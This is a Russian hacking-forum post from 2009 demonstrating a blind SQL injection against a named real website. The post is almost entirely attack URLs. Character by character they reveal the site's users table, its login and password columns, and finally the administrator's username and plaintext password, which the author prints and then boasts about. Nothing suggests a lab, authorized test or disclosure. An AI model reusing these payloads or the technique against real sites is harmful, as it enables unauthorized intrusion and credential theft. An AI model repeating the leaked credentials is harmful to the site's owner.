Тема: SQL Инъекции
Показать сообщение отдельно

  #6  
Старый 07.02.2009, 04:23
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
По умолчанию
http://www.photokzn.ru

так находим таблицу с пользователями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),1 ,1))='117 = u
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),2 ,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),3 ,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),4 ,1))='114 = r
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),5 ,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),6 ,1))='0
таблица users


находим колонку с паролями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),1,1))='112 = p
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),2,1))='97 = a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),3,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),5,1))='0
колонка pass


находим колонку с логинами:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),1,1))='108 = l
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),2,1))='111 = o
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),3,1))='103 = g
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),4,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),5,1))='110 = n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),6,1))='0
колонка login

Теперь вывод логина:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),1,1))='97 a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),2,1))='100 d
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),3,1))='109 m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),4,1))='105 i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),5,1))='110 n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),6,1))='0
логин админа - admin


вывод пароля из users где имя пользователя admin
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),1,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),2,1))='104 = h
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),3,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),5,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),6,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),7,1))='109 = m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),8,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),9,1))='0
пароль админа thistime

P.s. Там на сайте 5 версия MySQL, можно было бы провести иньекцию по другому, но я не ищу легких путей!!!!=))
 
Ответить с цитированием